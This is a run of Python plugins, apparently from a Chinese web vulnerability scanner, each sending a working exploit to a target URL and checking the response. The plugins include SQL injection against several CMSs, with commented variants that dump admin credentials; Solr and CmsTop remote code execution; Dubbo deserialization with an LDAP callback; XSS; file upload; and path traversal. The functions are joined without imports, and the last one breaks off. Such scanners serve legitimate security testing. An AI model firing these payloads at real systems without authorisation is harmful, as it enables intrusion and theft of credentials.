def medusa(**kwargs)->None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
payload_url = url
Headers["Accept-Language"] = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
Headers["Accept-Encoding"] = "gzip, deflate"
resp = requests.options(payload_url,headers=Headers,proxies=proxies, timeout=5, verify=False)
if r"OPTIONS" in resp.headers.get('Allow'):
Medusa = "{}存在Options方法开启漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,resp.headers)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
headers = {
'User-Agent': RandomAgent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
payload_url=scheme + "://" + url + ":" + str(port) +'/solr/admin/cores'
step1 =requests.get(payload_url,timeout=6, headers = headers).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/"+name+"/dataimport?_=1582117587113&indent=on&wt=json"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept': 'application/json',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest"
}
DL = Dnslog() # 初始化DNSlog
#POC没问题DNSlog有问题
# DL="p61rpm.dnslog.cn"
data2="command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22ping+{}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport".format(DL.dns_host())
resp = requests.post(payload_url,data=data2,headers=headers, timeout=20, verify=False)
if DL.result():
Medusa = "{}存在Solr远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\nPOST包:{}\r\n".format(url,payload_url,data2)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/index.php"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"X-Forwarded-For":
"' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,md5(c),user,0x27,0x7e) from b2bbuilder_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1:
Medusa = "{}存在B2Bbuilder头部SQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, Token, proxies=None):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/index.php/dance/so/key/?key=%252527)%20%2561%256E%2564%201=2%20union%20%2573%2565%256C%2565%2563%2574%201,md5(4684894),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42%20%23"
# 爆用户密码用
# payload = "/index.php/dance/so/key/?key=%252527)%20%2561%256E%2564%201=2%20union%20%2573 \
# %2565%256C%2565%2563%2574%201,concat(CS_AdminName,0x3a,CS_AdminPass),3,4,5,6,\
# 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,\
# 34,35,36,37,38,39,40,41,42%20from%20cscms_admin%23"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
if con.find("'904c23abadd5a4648a973c86385f3930'") != -1:
Medusa = "{}存在CSDJCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/plus/ajax_user.php"
data = "sunrain%df%27%20or%20%df%271%df%27=%df%271&act=get_pass_check"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.post(payload_url,
data=data,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("true") != -1:
Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
RD = randoms().result(20)
payload = "/jobs/jobs-list.php?key=%22%20autofocus%20onfocus=alert%28{}%29%20style=%22%22".format(
RD)
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find(
'" autofocus onfocus=alert({}) style='.format(RD)) != -1:
Medusa = "{}存在74CMS存在反射型XSS漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/enableq/Android/FileUpload.php?optionID=1'
payload_url = scheme + "://" + url +":"+ str(port) + payload
data = """
------WebKitFormBoundaryQXp86Nj8hIcFckX4
Content-Disposition: form-data; name="uploadedfile_1"; filename="xxx.php"
Content-Type: application/octet-stream
<?php echo md5(1);unlink(__FILE__);?>
------WebKitFormBoundaryQXp86Nj8hIcFckX4
Content-Disposition: form-data; name="button"
提交
------WebKitFormBoundaryQXp86Nj8hIcFckX4--
"""
headers = {
'User-Agent': RandomAgent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
}
resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies,timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("true|1|") != -1 :
Medusa = "{}存在EnableQ任意文件上传漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, Token, proxies=None):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/index.php"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"X-Forwarded-For":
"1.1.1.1',(select 1 from (select count(*),concat((Select concat(md5(3.14))),floor(rand(0)*2))x from information_schema.tables group by x)a),1,1)#"
}
s = requests.session()
resp = s.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("4beed3b9c4a886067de0e3a094246f781") != -1:
Medusa = "{}存在B2BbuilderSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
Payloads = [
'/ajax.php?act=check_field&field_name=a%27%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,md5(123),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)#',
'/link.php?act=go&city=sanming&url=secer%27)%20and%20(updatexml(1,concat(0x3a,(select%20concat(md5(123))%20from%20jytuan_admin%20limit%201)),1))%23',
'/vote.php?act=dovote&name[1 and (select 1 from(select count(*),concat(0x7c,md5(123),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)%23][111]=aa',
"/subscribe.php?act=unsubscribe&code=secer') and (updatexml(1,concat(0x3a,(select concat(md5(123)) from easethink_admin limit 1)),1))#",
"/sms.php?act=do_unsubscribe_verify&mobile=a' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,md5(123),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#"
]
for payload in Payloads:
try:
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find(
"202cb962ac59075b964b07152d234b70") != -1:
Medusa = "{}存在EasethinkSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
payload = "/app/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}"
payloadurl = scheme + "://" + url + ":" + str(port) + payload
payload2 = "/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}"
domain_name = ".".join(url.split(".")[1:])
payloadurl2 = scheme + "://app" + domain_name + ":" + str(port) + payload2
Payloads = [payloadurl, payloadurl2]
for payload_url in Payloads:
try:
headers = {
'User-Agent':
RandomAgent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find('PHP Version') != -1 and con.find(
'Configure Command') != -1:
Medusa = "{}存在CmsTop远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/delete_cart_goods.php'
data = 'id=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)'
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
}
resp = requests.post(payload_url,
headers=headers,
data=data,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("for key 'group_key'") != -1:
Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/install/index.php?post=1"
payload_url = scheme + "://" + url + ":" + str(port) + payload
data = {"state": "../../../../../../../../../../windows/system.ini%00"}
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.post(payload_url,
data=data,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find('[driver32]]') != -1:
Medusa = "{}存在AfterLogic_WebMail任意文件包含漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/plus/ajax_common.php?act=hotword&query=錦'%20a<>nd%201=2%20un<>ion%20sel<>ect%201,md5(736482),3%23"
#用EXP可以获取密码和账户
EXP = "/plus/ajax_common.php?act=hotword&query=錦'%20a<>nd%201=2%20un<>ion%20sel<>ect%201,group_concat(admin_name,0x3a,pwd,0x3a,pwd_hash),3%20fr<>om%20qs_admin%23"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if con.find('5cee14937d463a819651c8e1c504613c') != -1:
Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm = randoms().result(20)
payload = "/user/do.php?ac=edit@op=zl"
payload_url = scheme + "://" + url + ":" + str(port) + payload
referer = scheme + "://" + url
Headers["Referer"] = "{}/admin/admin_t ... ;file=artindex.html".format(
referer)
Headers["Connection"] = "keep-alive"
Headers["Content-Type"] = "application/x-www-form-urlencoded"
Headers["Content-Length"] = "169"
data = "CS_Name=aaaaaa&CS_Email=a%40qq.com&CS_Nichen=aaaaaa&CS_Sex=0&CS_City=%C1%C9%C4%FE%CA%A1&CS_QQ=111111111&CS_Qianm=<isindex type=image src=1 onerror=alert(/{}/)>".format(
rm)
resp = requests.post(payload_url,
data=data,
headers=Headers,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
if con.find("<isindex type=image src=1 onerror=alert(/{}/)>".format(
rm)) != -1:
Medusa = "{}存在CSDJCMS存储型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
DL = Dnslog()
client = DubboClient(url, int(port))
JdbcRowSetImpl = new_object('com.sun.rowset.JdbcRowSetImpl',
dataSource="ldap://" + DL.dns_host(),
strMatchColumns=["foo"])
JdbcRowSetImplClass = new_object(
'java.lang.Class',
name="com.sun.rowset.JdbcRowSetImpl",
)
toStringBean = new_object('com.rometools.rome.feed.impl.ToStringBean',
beanClass=JdbcRowSetImplClass,
obj=JdbcRowSetImpl)
resp = client.send_request_and_return_response(
service_name=
'org.apache.dubbo.spring.boot.sample.consumer.DemoService',
# 此处可以是 $invoke、$invokeSync、$echo 等,通杀 2.7.7 及 CVE 公布的所有版本。
method_name='$invoke',
args=[toStringBean])
time.sleep(3)
if DL.result():
Medusa = "{} 存在Dubbo反序列化漏洞(CVE-2020-1948)\r\n验证数据:\r\n返回DNSLOG:{}\r\n使用DNSLOG数据:{}\r\n返回数据包:{}\r\n".format(
url, DL.dns_text(), DL.dns_host(), str(resp))
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/ecshop/api.php"
data = "return_data=json&ac=1&ac=search_goods_list&api_version=1.0&last_modify_st_time=1&pages=1&counts=1 UNION ALL SELECT NULL,CONCAT(0x20,IFNULL(CAST(md5(c) AS CHAR),0x20),0x20)#"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
}
resp = requests.post(payload_url,
headers=headers,
data=data,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if con.find("4a8a08f09d37b73795649038408b5f33") != -1:
Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/dami/index.php?s=/api/ajax_arclist/model/article/field/md5(1)%23"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("c4ca4238a0b923820dcc509a6f75849b") != -1:
Medusa = "{}存在大米CMSSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/upload/wap/personal/wap_apply.php?act=apply_add"
data = "resume_id=1&jobs_id=23 and if(ascii(substr(md5(c),1,1))=113,1,null)%23"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.post(payload_url,
data=data,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if con.find('4a8a08f09d37b73795649038408b5f33') != -1:
Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm = randoms().result(10)
payload = '/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27{}%27%29%3C/script%3E'.format(
rm)
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find('<script>alert("' + rm +
'")</script>') != -1:
Medusa = "{}存在CMSimple跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
